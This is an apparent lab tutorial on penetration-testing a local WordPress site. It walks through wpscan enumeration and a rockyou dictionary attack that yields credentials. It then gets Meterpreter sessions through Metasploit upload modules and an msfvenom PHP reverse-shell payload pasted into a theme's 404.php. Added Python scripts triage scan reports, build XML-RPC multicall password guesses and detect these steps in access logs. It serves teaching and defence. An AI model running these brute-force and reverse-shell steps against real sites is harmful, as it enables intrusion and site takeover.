WordPress penetration testing

In this article we will see how to enumerate a WordPress website, how to find login credentials for it, and how to turn those credentials into a shell. The tool used throughout is wpscan, which ships with Kali Linux.


Table of Contents:

  1. Introduction to WPscan

  2. Normal Scan

  3. Enumerating plugins

  4. Enumerating vulnerable plugins

  5. Enumerating themes

  6. Enumerating vulnerable themes

  7. Getting a session using metasploit

  8. Enumerating users and finding credentials

  9. Uploading a file to get reverse shell

  10. Uploading a payload


Introduction to WPscan

Get the latest version with git clone https://github.com/wpscanteam/wpscan.git, change into the wpscan directory with cd, install the Ruby dependencies (bundle install), and then run the tool from the bin directory, which is where the ./wpscan commands below are executed. On Kali the packaged build is also available (apt install wpscan) and is run simply as wpscan.


WPScan is a black-box scanner: it only sends HTTP requests to the target and, from the responses, identifies the WordPress version and the installed plugins and themes, then looks those versions up in its vulnerability database. Two caveats: the lookup is version matching, so a "vulnerable" result means a public advisory exists for the detected version and still has to be confirmed, and recent WPScan releases only show vulnerability data when a (free) API token is supplied with --api-token; without it the enumeration still works but no vulnerabilities are listed.


Normal Scan

In this section we find the WordPress version with a plain scan, which is the command used in the screenshot:

./wpscan --url http://127.0.0.1

Replace the URL with that of the target; 127.0.0.1 is used throughout because the test site is hosted on the local machine. WPScan reports the detected version together with how it found it (for example the generator meta tag, readme.html, or the ?ver= query string on bundled scripts and styles), and whether that version has known issues.


Enumerating plugins

A plugin is a piece of code added to a WordPress site to extend its functionality. Plugins are third-party code and are the most common source of exploitable bugs on a WordPress site, so they are the first thing to enumerate:

./wpscan --url http://127.0.0.1 --enumerate p

This lists the installed plugins WPScan can detect, as shown in the screenshot. The p option checks the list of popular plugins; --enumerate ap tests every plugin slug WPScan knows, which is far slower and noisier. Detection is mixed by default: passive (references in the page source) plus aggressive (requesting files such as /wp-content/plugins/<slug>/readme.txt), and the version is read from the plugin's readme or changelog, so a plugin without a readme may be found but show an unknown version.


Enumerating vulnerable plugins

Here only a single plugin is installed, so it is quick to check by hand whether it is vulnerable. When many plugins are detected, the command

./wpscan --url http://127.0.0.1 --enumerate vp

restricts the output to plugins with known vulnerabilities for the detected version, giving a title, the version the issue was fixed in, and references for each. If the version could not be determined, WPScan lists every known issue for that plugin, and those entries need manual confirmation before anything is exploited.


Enumerating themes

A theme controls the overall look of the site (fonts, colours, sizes, layout). Themes are enumerated in the same fashion, and the p/ap/vp distinction for plugins applies to themes as t/at/vt:

./wpscan --url http://127.0.0.1 --enumerate t


Enumerating vulnerable themes

To list only installed themes with known vulnerabilities, run:

./wpscan --url http://127.0.0.1 --enumerate vt

No vulnerable themes were found on this target.
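Reading the plugin and theme findings off the screen is fine for one host, but on a larger engagement it is easier to have WPScan write JSON (wpscan --url ... -f json -o report.json) and triage it programmatically. The following Python script is an added example, not part of the original article and not WPScan's own code. The embedded report is a constructed sample in the shape of WPScan's JSON output (the field names version, plugins, themes, users, vulnerabilities, fixed_in, outdated and latest_version follow that format; the values and advisory URLs are invented), and the version comparison it performs is a simplified version of what WPScan does internally.

```python
"""Triage a WPScan JSON report (wpscan --url ... -f json -o report.json).
Added example: SAMPLE_REPORT is constructed in the shape of WPScan's JSON
output for this article; the values are not real scan data."""
import json
import re
import sys

SAMPLE_REPORT = """
{
  "target_url": "http://127.0.0.1/",
  "version": {"number": "5.3", "status": "insecure",
    "vulnerabilities": [{"title": "Constructed core finding", "fixed_in": "5.3.1",
                         "references": {"url": ["https://example.invalid/core"]}}]},
  "plugins": {
    "reflex-gallery": {"slug": "reflex-gallery", "version": {"number": "3.1.3"},
      "latest_version": "3.1.7", "outdated": true,
      "vulnerabilities": [{"title": "Constructed: Reflex Gallery <= 3.1.3 - Arbitrary File Upload",
                           "fixed_in": "3.1.4",
                           "references": {"url": ["https://example.invalid/reflex"]}}]},
    "akismet": {"slug": "akismet", "version": {"number": "4.1.3"},
      "latest_version": "4.1.3", "outdated": false, "vulnerabilities": []}
  },
  "themes": {"online-portfolio": {"slug": "online-portfolio", "version": null, "vulnerabilities": []}},
  "users": {"haclabs": {"id": 1, "found_by": "Author Id Brute Forcing - Author Pattern (Aggressive Detection)"}}
}
"""


def load_report(text):
    """Parse the JSON text WPScan writes with -f json."""
    return json.loads(text)


def version_key(version):
    """'3.1.3' -> (3, 1, 3); tolerates suffixes such as '5.3-beta'."""
    return tuple(int(p) for p in re.findall(r"\d+", version))


def version_applies(detected, fixed_in):
    """True if the detected version is below the fix, False if patched, None if
    either side is unknown (WPScan then lists every known issue for the
    component, so those entries must be confirmed by hand)."""
    if not detected or not fixed_in:
        return None
    return version_key(detected) < version_key(fixed_in)


def _row(kind, slug, detected, vuln):
    refs = vuln.get("references") or {}
    return {"kind": kind, "slug": slug, "version": detected,
            "title": vuln.get("title"), "fixed_in": vuln.get("fixed_in"),
            "applies": version_applies(detected, vuln.get("fixed_in")),
            "cves": ["CVE-" + c for c in refs.get("cve", [])],
            "urls": refs.get("url", [])}


def vulnerable_components(report):
    """One row per known vulnerability across core, plugins and themes."""
    rows = []
    core = report.get("version") or {}
    for vuln in core.get("vulnerabilities", []):
        rows.append(_row("core", "wordpress", core.get("number"), vuln))
    for kind in ("plugins", "themes"):
        for slug, comp in (report.get(kind) or {}).items():
            detected = (comp.get("version") or {}).get("number")  # version may be null
            for vuln in comp.get("vulnerabilities", []):
                rows.append(_row(kind[:-1], slug, detected, vuln))
    return rows


def outdated_components(report):
    """Plugins/themes behind their latest release, even with no known advisory."""
    out = []
    for kind in ("plugins", "themes"):
        for slug, comp in (report.get(kind) or {}).items():
            if comp.get("outdated"):
                detected = (comp.get("version") or {}).get("number")
                out.append((kind[:-1], slug, detected, comp.get("latest_version")))
    return out


def usernames(report):
    """Usernames WPScan enumerated; these feed the -U list of the password attack."""
    return sorted((report.get("users") or {}).keys())


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_REPORT
    report = load_report(text)
    for r in vulnerable_components(report):
        flag = {True: "AFFECTED", False: "patched", None: "UNCONFIRMED"}[r["applies"]]
        print(f"[{flag}] {r['kind']} {r['slug']} {r['version']}: {r['title']} (fixed in {r['fixed_in']})")
    for kind, slug, detected, latest in outdated_components(report):
        print(f"[outdated] {kind} {slug} {detected} -> {latest}")
    print("users:", ", ".join(usernames(report)))
```

Run it as python3 triage.py report.json against a real report; with no argument it prints the constructed sample. The UNCONFIRMED flag is the important one: when WPScan could not read a version (the theme above), it has listed issues it cannot tie to the installed release.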


Getting a session using Metasploit

WPScan flagged the Reflex Gallery plugin as vulnerable. Searching Metasploit for the plugin name turns up a module for its arbitrary file upload, which we use to get a session.

exploit used : exploit/unix/webapp/wp_reflexgallery_file_upload

Select the module with use, set RHOSTS to the target and TARGETURI to the WordPress path (/ for this site), set LHOST to the attacker's address, and run it. The module uploads a PHP payload through the plugin's upload handler and requests it, and a Meterpreter session opens, as shown in the screenshot. The uploaded file stays on the server, so note its path for cleanup at the end of the test.


Enumerating users and finding credentials

WordPress sites have a login page at http://127.0.0.1/wp-login.php; an account that can log in there, especially an administrator, controls the whole site.

Logging in needs a username and a password, so the first step is to find valid usernames:

./wpscan --url http://127.0.0.1 --enumerate u

WPScan collects users from several sources: the author archive redirect (/?author=1 redirects to /author/<username>/), the public REST API endpoint /wp-json/wp/v2/users, RSS feeds, and the login form, whose default error message for a wrong password names the user. Here one user exists, with username haclabs. The next step is to find the password for haclabs with a dictionary attack using /usr/share/wordlists/rockyou.txt:

command used : ./wpscan --url http://127.0.0.1 -P /usr/share/wordlists/rockyou.txt -U haclabs

-U takes the username (or a file of usernames) and -P the wordlist. By default the attack posts to wp-login.php, one request per guess; if xmlrpc.php is enabled, --password-attack xmlrpc-multicall packs many guesses into a single request and is much faster. Expect rate limiting or lockout plugins on a real site, and keep in mind that a list the size of rockyou takes a long time at one request per guess.

username : haclabs

password : 987654321

We now have valid credentials and can log into the admin panel of the website.
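The checks behind --enumerate u and the password attack are ordinary HTTP requests, and it helps to see them spelled out for the cases where WPScan's output is ambiguous or where they have to be scripted by hand. The Python below is an added example (not the article's code and not WPScan's). It runs on constructed responses embedded inline rather than against a live site; the author-archive pattern and the login-error wording are WordPress defaults that a site owner can change, the REST response and XML-RPC response are constructed to match the documented formats, and the function names are this example's own.

```python
"""The HTTP checks behind WPScan's user enumeration and password attack.
Added example with constructed responses (no network access). The patterns
assume WordPress's default permalinks and login-error wording, which a site
owner can change, so treat a miss as 'unknown' rather than 'absent'."""
import json
import re
import xml.etree.ElementTree as ET

AUTHOR_RE = re.compile(r"/author/([^/?#]+)/?")
# Default wp-login.php wording when the user exists but the password is wrong.
LOGIN_ERROR_RE = re.compile(r"password you entered for the (?:username|email address) "
                            r"<strong>([^<]+)</strong> is incorrect")


def user_from_author_redirect(location):
    """GET /?author=1 redirects to /author/<login-slug>/ on default permalinks."""
    m = AUTHOR_RE.search(location or "")
    return m.group(1) if m else None


def users_from_rest_api(body):
    """GET /wp-json/wp/v2/users lists the slug of every user with a published post."""
    try:
        data = json.loads(body)
    except ValueError:
        return []
    return [u["slug"] for u in data if isinstance(u, dict) and "slug" in u]


def user_from_login_error(html):
    """A wrong password for an existing user names that user in the error."""
    m = LOGIN_ERROR_RE.search(html)
    return m.group(1) if m else None


def login_form(username, password):
    """Form fields wp-login.php expects; send them with the cookie
    wordpress_test_cookie=WP Cookie check, or the attempt is rejected."""
    return {"log": username, "pwd": password, "wp-submit": "Log In",
            "redirect_to": "/wp-admin/", "testcookie": "1"}


def login_outcome(status, headers, body):
    """A successful login is a redirect that sets a wordpress_logged_in_* cookie."""
    if status in (301, 302, 303) and "wordpress_logged_in_" in headers.get("Set-Cookie", ""):
        return "success"
    return "failure" if 'id="login_error"' in body else "unknown"


def _string(parent, text):
    ET.SubElement(ET.SubElement(parent, "value"), "string").text = text


def xmlrpc_multicall(username, passwords):
    """One system.multicall POST to xmlrpc.php that tries every password via
    wp.getUsersBlogs (WPScan's --password-attack xmlrpc-multicall). ElementTree
    escapes XML metacharacters in the guesses."""
    call = ET.Element("methodCall")
    ET.SubElement(call, "methodName").text = "system.multicall"
    param = ET.SubElement(ET.SubElement(call, "params"), "param")
    data = ET.SubElement(ET.SubElement(ET.SubElement(param, "value"), "array"), "data")
    for pw in passwords:
        struct = ET.SubElement(ET.SubElement(data, "value"), "struct")
        member = ET.SubElement(struct, "member")
        ET.SubElement(member, "name").text = "methodName"
        _string(member, "wp.getUsersBlogs")
        member = ET.SubElement(struct, "member")
        ET.SubElement(member, "name").text = "params"
        args = ET.SubElement(ET.SubElement(ET.SubElement(member, "value"), "array"), "data")
        _string(args, username)
        _string(args, pw)
    return ET.tostring(call, encoding="unicode")


def multicall_hits(response_xml, passwords):
    """Passwords whose call returned blogs rather than a faultCode struct;
    results come back in request order, one per guess."""
    root = ET.fromstring(response_xml)
    results = root.findall("params/param/value/array/data/value")
    return [pw for pw, value in zip(passwords, results)
            if "faultCode" not in [n.text for n in value.findall("struct/member/name")]]


# Constructed responses for the demo below.
SAMPLE_REST = '[{"id": 1, "name": "haclabs", "slug": "haclabs", "link": "http://127.0.0.1/author/haclabs/"}]'
SAMPLE_LOGIN_ERROR = ('<div id="login_error"><strong>Error</strong>: The password you entered '
                      'for the username <strong>haclabs</strong> is incorrect.</div>')
SAMPLE_MULTICALL = (
    "<methodResponse><params><param><value><array><data>"
    "<value><struct><member><name>faultCode</name><value><int>403</int></value></member>"
    "<member><name>faultString</name><value><string>Incorrect username or password."
    "</string></value></member></struct></value>"
    "<value><array><data><value><array><data><value><struct><member><name>blogName</name>"
    "<value><string>haclabs</string></value></member></struct></value></data></array></value>"
    "</data></array></value></data></array></value></param></params></methodResponse>")

if __name__ == "__main__":
    print(user_from_author_redirect("http://127.0.0.1/author/haclabs/"))
    print(users_from_rest_api(SAMPLE_REST))
    print(user_from_login_error(SAMPLE_LOGIN_ERROR))
    print(multicall_hits(SAMPLE_MULTICALL, ["password", "987654321"]))
```

The multicall builder is why the xmlrpc-multicall attack is so much faster than posting to wp-login.php: one request carries hundreds of guesses and the response lists a fault for each wrong one. Many hosts now block or limit system.multicall for exactly that reason, so a single fault for the whole request means the method is disabled, not that every guess failed.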


Uploading a file to get reverse shell


In this section we create a malicious PHP file that gives us a shell when it is executed by the web server. Generate it with msfvenom:

command used: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.9 lport=4444 -f raw

lhost is the IP of the Kali (attacker) machine and lport the port the handler will listen on. -f raw prints the PHP source to the terminal; copy the generated code (the highlighted part in the screenshot). Then go to http://127.0.0.1/wp-login.php and log in with the credentials found earlier; the login succeeds.

Now go to Appearance -> Theme Editor, select the currently active theme, open the 404 Template (404.php) and paste the code into it. The file must remain valid PHP after the paste (the template already contains its own <?php ... ?> blocks, so put the payload in its own block at the top of the file rather than inside an existing one); a parse error gives a blank page or a 500 and no session.

Click Update File. Next start a listener in Metasploit (exploit/multi/handler with payload php/meterpreter/reverse_tcp and the same LHOST and LPORT as above), then execute the edited template by requesting it directly: http://127.0.0.1/wp-content/themes/online-portfolio/404.php

Here the active theme is online-portfolio; substitute the name of the active theme if it differs, otherwise nothing else changes. Two things to keep in mind: WordPress also runs 404.php for every request to a page that does not exist, so the payload fires for ordinary visitors too and should be removed as soon as the session is established, and the whole technique depends on the theme editor being enabled, which defenders switch off by adding define('DISALLOW_FILE_EDIT', true); to wp-config.php.

We succeed in getting a meterpreter session!


Uploading a payload

Since we know the credentials of the user haclabs, we can also let Metasploit do the upload, using the exploit : exploit/unix/webapp/wp_admin_shell_upload

Set RHOSTS, TARGETURI, USERNAME and PASSWORD and run it. The module logs in as that user, uploads a small plugin containing the payload through the admin plugin installer, triggers it and opens a Meterpreter session. It needs an account that is allowed to install plugins, which is why the haclabs credentials work here; check wp-content/plugins afterwards and remove anything the module left behind.

And exploit: we have a Meterpreter session!
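Everything in this walkthrough leaves a recognisable trail in the web server's access log, and knowing what that trail looks like is the check a practitioner wants before running the same steps outside a lab, as well as the starting point for a detection. The script below is an added example and not part of the article. Its log lines are constructed in Apache/nginx combined format; the WPScan User-Agent string and the theme-editor request path follow defaults that can differ (WPScan has --random-user-agent, and the editor's save request varies between WordPress versions), and the thresholds are arbitrary.

```python
"""Spot the steps of this walkthrough in combined-format web access logs.
Added example: the log lines are constructed, and the rules are heuristics
with arbitrary thresholds (WPScan's default User-Agent can be changed with
--random-user-agent, and the theme-editor save path varies by version)."""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')
# Template and plugin PHP files are included by WordPress, not requested directly.
CONTENT_PHP_RE = re.compile(r"^/wp-content/(themes|plugins)/[^/]+/.*\.php(\?|$)")

_UA = "WPScan v3.7.8 (https://wpscan.org/)"   # constructed scanner User-Agent
SAMPLE_LOG = [
    f'192.168.43.9 - - [10/Mar/2020:10:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "{_UA}"',
    f'192.168.43.9 - - [10/Mar/2020:10:00:02 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "{_UA}"',
    f'192.168.43.9 - - [10/Mar/2020:10:00:02 +0000] "GET /?author=2 HTTP/1.1" 404 0 "-" "{_UA}"',
    f'192.168.43.9 - - [10/Mar/2020:10:00:02 +0000] "GET /?author=3 HTTP/1.1" 404 0 "-" "{_UA}"',
    f'192.168.43.9 - - [10/Mar/2020:10:00:03 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 312 "-" "{_UA}"',
] + [
    f'192.168.43.9 - - [10/Mar/2020:10:00:{10 + i:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 2400 "-" "{_UA}"'
    for i in range(6)
] + [
    '192.168.43.9 - - [10/Mar/2020:10:01:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 60 '
    '"http://127.0.0.1/wp-admin/theme-editor.php?file=404.php&theme=online-portfolio" "Mozilla/5.0"',
    '192.168.43.9 - - [10/Mar/2020:10:01:05 +0000] "GET /wp-content/themes/online-portfolio/404.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Mar/2020:10:02:00 +0000] "GET /about/ HTTP/1.1" 200 8100 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Mar/2020:10:02:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines, login_threshold=5):
    """Return (ip, rule, detail) alerts grouped per client address."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)
    alerts = []
    for ip, recs in by_ip.items():
        if any("wpscan" in r["ua"].lower() for r in recs):
            alerts.append((ip, "wpscan_user_agent", ""))
        authors = {r["path"] for r in recs if "author=" in r["path"]}
        if len(authors) >= 3:
            alerts.append((ip, "author_id_enumeration", f"{len(authors)} ids"))
        if any(r["path"].startswith("/wp-json/wp/v2/users") for r in recs):
            alerts.append((ip, "rest_user_listing", ""))
        logins = [r for r in recs if r["method"] == "POST" and r["path"].startswith("/wp-login.php")]
        if len(logins) >= login_threshold:
            alerts.append((ip, "wp_login_bruteforce", f"{len(logins)} attempts"))
        if any(r["method"] == "POST" and r["path"].startswith("/xmlrpc.php") for r in recs):
            alerts.append((ip, "xmlrpc_post", ""))
        for r in recs:
            if r["method"] == "POST" and "theme-editor.php" in r["path"] + r["referer"]:
                alerts.append((ip, "theme_editor_write", r["referer"] or r["path"]))
            if r["method"] == "GET" and r["status"] == "200" and CONTENT_PHP_RE.match(r["path"]):
                alerts.append((ip, "direct_content_php_hit", r["path"]))
    return alerts


if __name__ == "__main__":
    for ip, rule, detail in detect(SAMPLE_LOG):
        print(f"{ip:15} {rule:26} {detail}")
```

The last two rules are the ones worth keeping on a real site: a POST that saves a theme file and a direct 200 on a template under wp-content/themes rarely happen in normal use, whereas scanner User-Agents and login bursts are easy for an attacker to tone down.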

So this was all about wordpress penetration testing.


© 2020 by HacLabs.